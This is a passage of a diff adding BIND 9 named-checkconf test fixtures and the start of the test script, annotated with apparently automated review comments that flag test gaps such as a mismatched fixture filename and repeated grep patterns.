+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+dnssec-policy "bad-salt" {
+ keys {
+ csk lifetime unlimited algorithm rsasha1;
+ };
+ nsec3param ;
+};
+
+zone "example.net" {
+ type master;
+ file "example.db";
+ dnssec-policy "bad-salt";
+};
+
diff --git a/bin/tests/system/checkconf/kasp-bad-nsec3-iter.conf b/bin/tests/system/checkconf/kasp-bad-nsec3-iter.conf
new file mode 100644
index 0000000..2333ca7
--- /dev/null
+++ b/bin/tests/system/checkconf/kasp-bad-nsec3-iter.conf
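Review bot: The policy in kasp-bad-nsec3-alg.conf is named `"bad-salt"`, the same name kasp-bad-nsec3-salt.conf uses, although this fixture sets no salt and instead pairs `algorithm rsasha1` with `nsec3param ;`. The name looks like a copy-paste leftover; renaming both occurrences (`dnssec-policy "bad-alg" {` and the zone's `dnssec-policy "bad-alg";`) keeps a failure message from pointing at the wrong fixture, provided the test script does not match on the old name. A one-line comment such as `// rsasha1 is not an NSEC3-capable algorithm; this policy must be rejected` would record why the file is expected to fail, which is presumably the intent given the filename.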
@@ -0,0 +1,61 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+dnssec-policy "rsasha1" {
+ keys {
+ csk lifetime P10Y algorithm nsec3rsasha1 1024;
+ };
+ nsec3param iterations 150;
+};
+
+dnssec-policy "rsasha1-bad" {
+ keys {
+ csk lifetime P10Y algorithm nsec3rsasha1 1024;
+ };
+ nsec3param iterations 151;
+};
+
+dnssec-policy "rsasha256" {
+ keys {
+ csk lifetime P10Y algorithm rsasha256 2048;
+ };
+ nsec3param iterations 150;
+};
+
+dnssec-policy "rsasha256-bad" {
+ keys {
+ csk lifetime P10Y algorithm rsasha256 2048;
+ };
+ nsec3param iterations 151;
+};
+
+dnssec-policy "rsasha512" {
+ keys {
+ csk lifetime P10Y algorithm rsasha512 4096;
+ };
+ nsec3param iterations 150;
+};
+
+dnssec-policy "rsasha512-bad" {
+ keys {
+ csk lifetime P10Y algorithm rsasha512 4096;
+ };
+ nsec3param iterations 151;
+};
+
+zone "example.net" {
+ type master;
+ file "example.db";
+ dnssec-policy "default";
+ inline-signing yes;
+};
diff --git a/bin/tests/system/checkconf/kasp-bad-nsec3-salt.conf b/bin/tests/system/checkconf/kasp-bad-nsec3-salt.conf
new file mode 100644
index 0000000..3465c39
--- /dev/null
+++ b/bin/tests/system/checkconf/kasp-bad-nsec3-salt.conf
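Review bot: Nothing in kasp-bad-nsec3-iter.conf states that 150 is the highest accepted `nsec3param iterations` value and 151 the first rejected one, and none of the six policies is attached to a zone (the zone uses `dnssec-policy "default"`). A header comment would help whoever next changes the limit, e.g. `// iterations 150 is the accepted maximum; each "-bad" policy (151) must produce exactly one error line.`, which matches the `[ $lines -ne 3 ]` check in tests.sh. The iteration cap limits the hashing work spent on each NSEC3 computation, so a silent loosening of this check is worth guarding against. A fixture with a value far above the limit would probably be useful alongside the off-by-one case.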
@@ -0,0 +1,23 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+dnssec-policy "bad-salt" {
+ nsec3param salt "pepper";
+};
+
+zone "example.net" {
+ type master;
+ file "example.db";
+ dnssec-policy "bad-salt";
+};
+
diff --git a/bin/tests/system/checkconf/kasp-ignore-keylen.conf b/bin/tests/system/checkconf/kasp-ignore-keylen.conf
new file mode 100644
index 0000000..b1f1af0
--- /dev/null
+++ b/bin/tests/system/checkconf/kasp-ignore-keylen.conf
@@ -0,0 +1,27 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+dnssec-policy "warn-length" {
+ keys {
+ // Algorithm 13 has predefined length, warn about length param.
+ csk lifetime unlimited algorithm ecdsa256 2048;
+ };
+};
+
+zone "example.net" {
+ type master;
+ file "example.db";
+ dnssec-policy "warn-length";
+ inline-signing yes;
+};
+
diff --git a/bin/tests/system/checkconf/max-cache-size-good.conf b/bin/tests/system/checkconf/max-cache-size-good.conf
new file mode 100644
index 0000000..bb12775
--- /dev/null
+++ b/bin/tests/system/checkconf/max-cache-size-good.conf
@@ -0,0 +1,16 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ max-cache-size 60%;
+};
diff --git a/bin/tests/system/checkconf/max-ttl.conf b/bin/tests/system/checkconf/max-ttl.conf
new file mode 100644
index 0000000..ec97de5
--- /dev/null
+++ b/bin/tests/system/checkconf/max-ttl.conf
@@ -0,0 +1,34 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ directory ".";
+ max-zone-ttl 600;
+};
+
+zone "maxttl1.example" {
+ type master;
+ file "maxttl-bad.db";
+};
+
+zone "maxttl2.example" {
+ type master;
+ file "maxttl-bad.db";
+ max-zone-ttl 300;
+};
+
+zone "maxttl3.example" {
+ type master;
+ file "maxttl-bad.db";
+ max-zone-ttl 120;
+};
diff --git a/bin/tests/system/checkconf/maxttl-bad.conf b/bin/tests/system/checkconf/maxttl-bad.conf
new file mode 100644
index 0000000..aa764be
--- /dev/null
+++ b/bin/tests/system/checkconf/maxttl-bad.conf
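Review bot: The per-zone overrides in max-ttl.conf (`max-zone-ttl 300` in maxttl2.example and `max-zone-ttl 120` in maxttl3.example) are not verified by the check this diff adds in tests.sh, which greps `TTL 900 exceeds configured max-zone-ttl 600` three times with the identical pattern. If the intent is one assertion per zone, the second and third greps presumably should match the 300 and 120 limits, e.g. `grep 'exceeds configured max-zone-ttl 300' check.out` and the same for 120. The exact message text for those zones is not visible here and should be confirmed against named-checkconf output. All three zones load maxttl-bad.db, so a comment naming which record TTLs (600 and 900) are expected to trip which limit would also help.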
@@ -0,0 +1,24 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ directory ".";
+ max-zone-ttl 8000w;
+};
+
+zone "maxttl.example" {
+ type master;
+ file "maxttl-bad.db";
+};
+
+
diff --git a/bin/tests/system/checkconf/maxttl-bad.db b/bin/tests/system/checkconf/maxttl-bad.db
new file mode 100644
index 0000000..978f0ec
--- /dev/null
+++ b/bin/tests/system/checkconf/maxttl-bad.db
@@ -0,0 +1,25 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 300 ; 5 minutes
+@ IN SOA mname1. . (
+ 1 ; serial
+ 20 ; refresh (20 seconds)
+ 20 ; retry (20 seconds)
+ 1814400 ; expire (3 weeks)
+ 3600 ; minimum (1 hour)
+ )
+ NS ns2
+ns2 A 10.53.0.2
+ MX 10 mail
+
+a 600 A 10.0.0.1
+mail 900 A 10.0.0.2
diff --git a/bin/tests/system/checkconf/maxttl.db b/bin/tests/system/checkconf/maxttl.db
new file mode 100644
index 0000000..3ad695e
--- /dev/null
+++ b/bin/tests/system/checkconf/maxttl.db
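Review bot: The fixture added here is `maxttl-bad.conf`, but the check in tests.sh runs `$CHECKCONF -z max-ttl-bad.conf`, and no file of that name is added in the visible part of this diff. If it does not exist elsewhere, named-checkconf presumably fails simply because the file cannot be opened, and the `&& ret=1` test passes without `max-zone-ttl 8000w` ever being parsed. Either rename the fixture or change the test line to `$CHECKCONF -z maxttl-bad.conf > checkconf.out$n 2>&1 && ret=1`, and additionally grep the output for the expected range error so a missing file cannot satisfy the check. maxttl.db, added alongside, is not referenced by either config shown here.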
@@ -0,0 +1,25 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 600 ; 10 minutes
+@ IN SOA mname1. . (
+ 1 ; serial
+ 20 ; refresh (20 seconds)
+ 20 ; retry (20 seconds)
+ 1814400 ; expire (3 weeks)
+ 3600 ; minimum (1 hour)
+ )
+ NS ns2
+ns2 A 10.53.0.2
+ MX 10 mail
+
+a A 10.0.0.1
+mail A 10.0.0.2
diff --git a/bin/tests/system/checkconf/notify.conf b/bin/tests/system/checkconf/notify.conf
new file mode 100644
index 0000000..d6e324a
--- /dev/null
+++ b/bin/tests/system/checkconf/notify.conf
@@ -0,0 +1,84 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+view one {
+ notify master-only;
+
+ # also-notify inconsistent with master-only notify option
+ zone "slave" {
+ type slave;
+ masters { 1.2.3.4; };
+ also-notify { 5.6.7.8; };
+ };
+
+ # OK
+ zone "master" {
+ type master;
+ file "filename";
+ also-notify { 5.6.7.8; };
+ };
+};
+
+view two {
+ notify no;
+
+ # also-notify inconsistent with notify option at the view level
+ zone "slave" {
+ type slave;
+ masters { 1.2.3.4; };
+ also-notify { 5.6.7.8; };
+ };
+
+ # OK
+ zone "master" {
+ type master;
+ file "filename";
+ notify yes;
+ also-notify { 5.6.7.8; };
+ };
+};
+
+view three {
+ # also-notify inconsistent with notify option at the zone level
+ zone "slave" {
+ type slave;
+ masters { 1.2.3.4; };
+ notify no;
+ also-notify { 5.6.7.8; };
+ };
+
+ # OK
+ zone "master" {
+ type master;
+ file "filename";
+ also-notify { 5.6.7.8; };
+ };
+};
+
+view four {
+ also-notify { 5.6.7.8; };
+
+ # OK
+ zone "slave" {
+ type slave;
+ masters { 1.2.3.4; };
+ notify master-only;
+ };
+
+ # OK
+ zone "master" {
+ type master;
+ file "filename";
+ notify no;
+ };
+};
diff --git a/bin/tests/system/checkconf/portrange-good.conf b/bin/tests/system/checkconf/portrange-good.conf
new file mode 100644
index 0000000..c4eb582
--- /dev/null
+++ b/bin/tests/system/checkconf/portrange-good.conf
@@ -0,0 +1,22 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ avoid-v4-udp-ports {
+ 1935;
+ 2605;
+ 4321;
+ 6514;
+ range 8610 8614;
+ };
+};
diff --git a/bin/tests/system/checkconf/range.conf b/bin/tests/system/checkconf/range.conf
new file mode 100644
index 0000000..b389ecb
--- /dev/null
+++ b/bin/tests/system/checkconf/range.conf
@@ -0,0 +1,25 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ port 999999;
+ dscp 222;
+ listen-on port 100 dscp 444 {
+ 127.0.0.1/32;
+ };
+};
+
+zone "example" {
+ type master;
+ file "example.db";
+};
diff --git a/bin/tests/system/checkconf/servestale.stale-refresh-time.0.conf b/bin/tests/system/checkconf/servestale.stale-refresh-time.0.conf
new file mode 100644
index 0000000..3ff6b0d
--- /dev/null
+++ b/bin/tests/system/checkconf/servestale.stale-refresh-time.0.conf
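Review bot: range.conf puts three out-of-range values in one fixture (`port 999999`, `dscp 222`, and `dscp 444` on the `listen-on` line), while the check in tests.sh only requires a non-zero exit from `$CHECKCONF range.conf`. Any single surviving range check therefore keeps the test passing, so a regression in one of the others would go unnoticed. Splitting this into one fixture per value, or grepping checkconf.out for each offending option, would pin each bound separately. A short comment listing which values are intentionally invalid would also help, since `port 100` on the same line is within range.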
@@ -0,0 +1,16 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ stale-refresh-time 0;
+};
diff --git a/bin/tests/system/checkconf/servestale.stale-refresh-time.29.conf b/bin/tests/system/checkconf/servestale.stale-refresh-time.29.conf
new file mode 100644
index 0000000..9e0669c
--- /dev/null
+++ b/bin/tests/system/checkconf/servestale.stale-refresh-time.29.conf
@@ -0,0 +1,16 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ stale-refresh-time 29;
+};
diff --git a/bin/tests/system/checkconf/shared.example.db b/bin/tests/system/checkconf/shared.example.db
new file mode 100644
index 0000000..5dcdd1b
--- /dev/null
+++ b/bin/tests/system/checkconf/shared.example.db
@@ -0,0 +1,13 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+@ 0 SOA . . 0 0 0 0 0
+@ 0 NS .
diff --git a/bin/tests/system/checkconf/tests.sh b/bin/tests/system/checkconf/tests.sh
new file mode 100644
index 0000000..c978efe
--- /dev/null
+++ b/bin/tests/system/checkconf/tests.sh
@@ -0,0 +1,643 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +status=0 +n=0 + +mkdir keys + +n=`expr $n + 1` +echo_i "checking that named-checkconf handles a known good config ($n)" +ret=0 +$CHECKCONF good.conf > checkconf.out$n 2>&1 || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that named-checkconf prints a known good config ($n)" +ret=0 +awk 'BEGIN { ok = 0; } /cut here/ { ok = 1; getline } ok == 1 { print }' good.conf > good.conf.in +[ -s good.conf.in ] || ret=1 +$CHECKCONF -p good.conf.in > checkconf.out$n || ret=1 +grep -v '^good.conf.in:' < checkconf.out$n > good.conf.out 2>&1 || ret=1 +cmp good.conf.in good.conf.out || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that named-checkconf -x removes secrets ($n)" +ret=0 +# ensure there is a secret and that it is not the check string. +grep 'secret "' good.conf.in > /dev/null || ret=1 +grep 'secret "????????????????"' good.conf.in > /dev/null 2>&1 && ret=1 +$CHECKCONF -p -x good.conf.in > checkconf.out$n || ret=1 +grep -v '^good.conf.in:' < checkconf.out$n > good.conf.out 2>&1 || ret=1 +grep 'secret "????????????????"' good.conf.out > /dev/null 2>&1 || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +for bad in bad-*.conf +do + n=`expr $n + 1` + echo_i "checking that named-checkconf detects error in $bad ($n)" + ret=0 + $CHECKCONF $bad > checkconf.out$n 2>&1 + if [ $? 
-ne 1 ]; then ret=1; fi + grep "^$bad:[0-9]*: " < checkconf.out$n > /dev/null || ret=1 + case $bad in + bad-update-policy[123].conf) + pat="identity and name fields are not the same" + grep "$pat" < checkconf.out$n > /dev/null || ret=1 + ;; + bad-update-policy[4589].conf|bad-update-policy1[01].conf) + pat="name field not set to placeholder value" + grep "$pat" < checkconf.out$n > /dev/null || ret=1 + ;; + bad-update-policy[67].conf|bad-update-policy1[2345].conf) + pat="missing name field type '.*' found" + grep "$pat" < checkconf.out$n > /dev/null || ret=1 + ;; + esac + if [ $ret -ne 0 ]; then echo_i "failed"; fi + status=`expr $status + $ret` +done + +for good in good-*.conf +do + n=`expr $n + 1` + echo_i "checking that named-checkconf detects no error in $good ($n)" + ret=0 + $CHECKCONF $good > checkconf.out$n 2>&1 + if [ $? -ne 0 ]; then echo_i "failed"; ret=1; fi + status=`expr $status + $ret` +done + +n=`expr $n + 1` +echo_i "checking that ancient options report a fatal error ($n)" +ret=0 +$CHECKCONF ancient.conf > ancient.out 2>&1 && ret=1 +grep "no longer exists" ancient.out > /dev/null || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that named-checkconf -z catches missing hint file ($n)" +ret=0 +$CHECKCONF -z hint-nofile.conf > hint-nofile.out 2>&1 && ret=1 +grep "could not configure root hints from 'nonexistent.db': file not found" hint-nofile.out > /dev/null || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that named-checkconf catches range errors ($n)" +ret=0 +$CHECKCONF range.conf > checkconf.out$n 2>&1 && ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that named-checkconf warns of notify inconsistencies ($n)" +ret=0 +$CHECKCONF notify.conf > checkconf.out$n 2>&1 +warnings=`grep "'notify' is disabled" < checkconf.out$n | wc -l` +[ $warnings 
-eq 3 ] || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking named-checkconf dnssec warnings ($n)" +ret=0 +# dnssec.1: dnssec-enable is obsolete +$CHECKCONF dnssec.1 > checkconf.out$n.1 2>&1 +grep "'dnssec-enable' is obsolete and should be removed" < checkconf.out$n.1 > /dev/null || ret=1 +# dnssec.2: auto-dnssec warning +$CHECKCONF dnssec.2 > checkconf.out$n.2 2>&1 +grep 'auto-dnssec may only be ' < checkconf.out$n.2 > /dev/null || ret=1 +# dnssec.3: should have no warnings (other than deprecation warning) +$CHECKCONF dnssec.3 > checkconf.out$n.3 2>&1 +grep "option 'auto-dnssec' is deprecated" < checkconf.out$n.3 > /dev/null || ret=1 +lines=$(wc -l < "checkconf.out$n.3") +if [ $lines != 1 ]; then ret=1; fi +# dnssec.4: should have specific deprecation warning +$CHECKCONF dnssec.4 > checkconf.out$n.4 2>&1 +grep "'auto-dnssec' option is deprecated and will be removed in BIND 9\.19" < checkconf.out$n.4 > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking named-checkconf deprecate warnings ($n)" +ret=0 +$CHECKCONF deprecated.conf > checkconf.out$n.1 2>&1 +grep "option 'managed-keys' is deprecated" < checkconf.out$n.1 > /dev/null || ret=1 +grep "option 'trusted-keys' is deprecated" < checkconf.out$n.1 > /dev/null || ret=1 +grep "option 'dscp' is deprecated" < checkconf.out$n.1 > /dev/null || ret=1 +grep "token 'dscp' is deprecated" < checkconf.out$n.1 > /dev/null || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` +# set -i to ignore deprecate warnings +$CHECKCONF -i deprecated.conf > checkconf.out$n.2 2>&1 +grep '.*' < checkconf.out$n.2 > /dev/null && ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking named-checkconf servestale warnings ($n)" +ret=0 +$CHECKCONF servestale.stale-refresh-time.0.conf > checkconf.out$n.1 2>&1 
+grep "'stale-refresh-time' should either be 0 or otherwise 30 seconds or higher" < checkconf.out$n.1 > /dev/null && ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` +ret=0 +$CHECKCONF servestale.stale-refresh-time.29.conf > checkconf.out$n.1 2>&1 +grep "'stale-refresh-time' should either be 0 or otherwise 30 seconds or higher" < checkconf.out$n.1 > /dev/null || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "range checking fields that do not allow zero ($n)" +ret=0 +for field in max-retry-time min-retry-time max-refresh-time min-refresh-time; do + cat > badzero.conf << EOF +options { + $field 0; +}; +EOF + $CHECKCONF badzero.conf > checkconf.out$n.1 2>&1 + [ $? -eq 1 ] || { echo_i "options $field failed" ; ret=1; } + cat > badzero.conf << EOF +view dummy { + $field 0; +}; +EOF + $CHECKCONF badzero.conf > checkconf.out$n.2 2>&1 + [ $? -eq 1 ] || { echo_i "view $field failed" ; ret=1; } + cat > badzero.conf << EOF +options { + $field 0; +}; +view dummy { +}; +EOF + $CHECKCONF badzero.conf > checkconf.out$n.3 2>&1 + [ $? -eq 1 ] || { echo_i "options + view $field failed" ; ret=1; } + cat > badzero.conf << EOF +zone dummy { + type secondary; + primaries { 0.0.0.0; }; + $field 0; +}; +EOF + $CHECKCONF badzero.conf > checkconf.out$n.4 2>&1 + [ $? 
-eq 1 ] || { echo_i "zone $field failed" ; ret=1; } +done +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking options allowed in inline-signing secondaries ($n)" +ret=0 +$CHECKCONF bad-dnssec.conf > checkconf.out$n.1 2>&1 +l=`grep "dnssec-dnskey-kskonly.*requires inline" < checkconf.out$n.1 | wc -l` +[ $l -eq 1 ] || ret=1 +$CHECKCONF bad-dnssec.conf > checkconf.out$n.2 2>&1 +l=`grep "dnssec-loadkeys-interval.*requires inline" < checkconf.out$n.2 | wc -l` +[ $l -eq 1 ] || ret=1 +$CHECKCONF bad-dnssec.conf > checkconf.out$n.3 2>&1 +l=`grep "update-check-ksk.*requires inline" < checkconf.out$n.3 | wc -l` +[ $l -eq 1 ] || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "check file + inline-signing for secondary zones ($n)" +$CHECKCONF inline-no.conf > checkconf.out$n.1 2>&1 +l=`grep "missing 'file' entry" < checkconf.out$n.1 | wc -l` +[ $l -eq 0 ] || ret=1 +$CHECKCONF inline-good.conf > checkconf.out$n.2 2>&1 +l=`grep "missing 'file' entry" < checkconf.out$n.2 | wc -l` +[ $l -eq 0 ] || ret=1 +$CHECKCONF inline-bad.conf > checkconf.out$n.3 2>&1 +l=`grep "missing 'file' entry" < checkconf.out$n.3 | wc -l` +[ $l -eq 1 ] || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking named-checkconf DLZ warnings ($n)" +ret=0 +$CHECKCONF dlz-bad.conf > checkconf.out$n 2>&1 +grep "'dlz' and 'database'" < checkconf.out$n > /dev/null || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking for missing key directory warning ($n)" +ret=0 +rm -rf test.keydir +$CHECKCONF warn-keydir.conf > checkconf.out$n.1 2>&1 +l=`grep "'test.keydir' does not exist" < checkconf.out$n.1 | wc -l` +[ $l -eq 1 ] || ret=1 +touch test.keydir +$CHECKCONF warn-keydir.conf > checkconf.out$n.2 2>&1 +l=`grep "'test.keydir' is not a directory" < checkconf.out$n.2 | wc 
-l` +[ $l -eq 1 ] || ret=1 +rm -f test.keydir +mkdir test.keydir +$CHECKCONF warn-keydir.conf > checkconf.out$n.3 2>&1 +l=`grep "key-directory" < checkconf.out$n.3 | wc -l` +[ $l -eq 0 ] || ret=1 +rm -rf test.keydir +if [ $ret -ne 0 ]; then echo_i "failed"; fi + +n=`expr $n + 1` +echo_i "checking that named-checkconf -z catches conflicting ttl with max-ttl ($n)" +ret=0 +$CHECKCONF -z max-ttl.conf > check.out 2>&1 +grep 'TTL 900 exceeds configured max-zone-ttl 600' check.out > /dev/null 2>&1 || ret=1 +grep 'TTL 900 exceeds configured max-zone-ttl 600' check.out > /dev/null 2>&1 || ret=1 +grep 'TTL 900 exceeds configured max-zone-ttl 600' check.out > /dev/null 2>&1 || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; ret=1; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that named-checkconf -z catches invalid max-ttl ($n)" +ret=0 +$CHECKCONF -z max-ttl-bad.conf > checkconf.out$n 2>&1 && ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; ret=1; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that named-checkconf -z skips zone check with alternate databases ($n)" +ret=0 +$CHECKCONF -z altdb.conf > checkconf.out$n 2>&1 || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; ret=1; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that named-checkconf -z skips zone check with DLZ ($n)" +ret=0 +$CHECKCONF -z altdlz.conf > checkconf.out$n 2>&1 || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; ret=1; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that named-checkconf -z fails on view with ANY class ($n)" +ret=0 +$CHECKCONF -z view-class-any1.conf > checkconf.out$n 2>&1 && ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; ret=1; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that named-checkconf -z fails on view with CLASS255 class ($n)" +ret=0 +$CHECKCONF -z view-class-any2.conf > checkconf.out$n 2>&1 && ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; ret=1; fi +status=`expr 
$status + $ret` + +n=`expr $n + 1` +echo_i "checking that named-checkconf -z passes on view with IN class ($n)" +ret=0 +$CHECKCONF -z view-class-in1.conf > checkconf.out$n 2>&1 || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; ret=1; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that named-checkconf -z passes on view with CLASS1 class ($n)" +ret=0 +$CHECKCONF -z view-class-in2.conf > checkconf.out$n 2>&1 || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; ret=1; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "check that check-names fails as configured ($n)" +ret=0 +$CHECKCONF -z check-names-fail.conf > checkconf.out$n 2>&1 && ret=1 +grep "near '_underscore': bad name (check-names)" < checkconf.out$n > /dev/null || ret=1 +grep "zone check-names/IN: loaded serial" < checkconf.out$n > /dev/null && ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; ret=1; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "check that check-mx fails as configured ($n)" +ret=0 +$CHECKCONF -z check-mx-fail.conf > checkconf.out$n 2>&1 && ret=1 +grep "near '10.0.0.1': MX is an address" 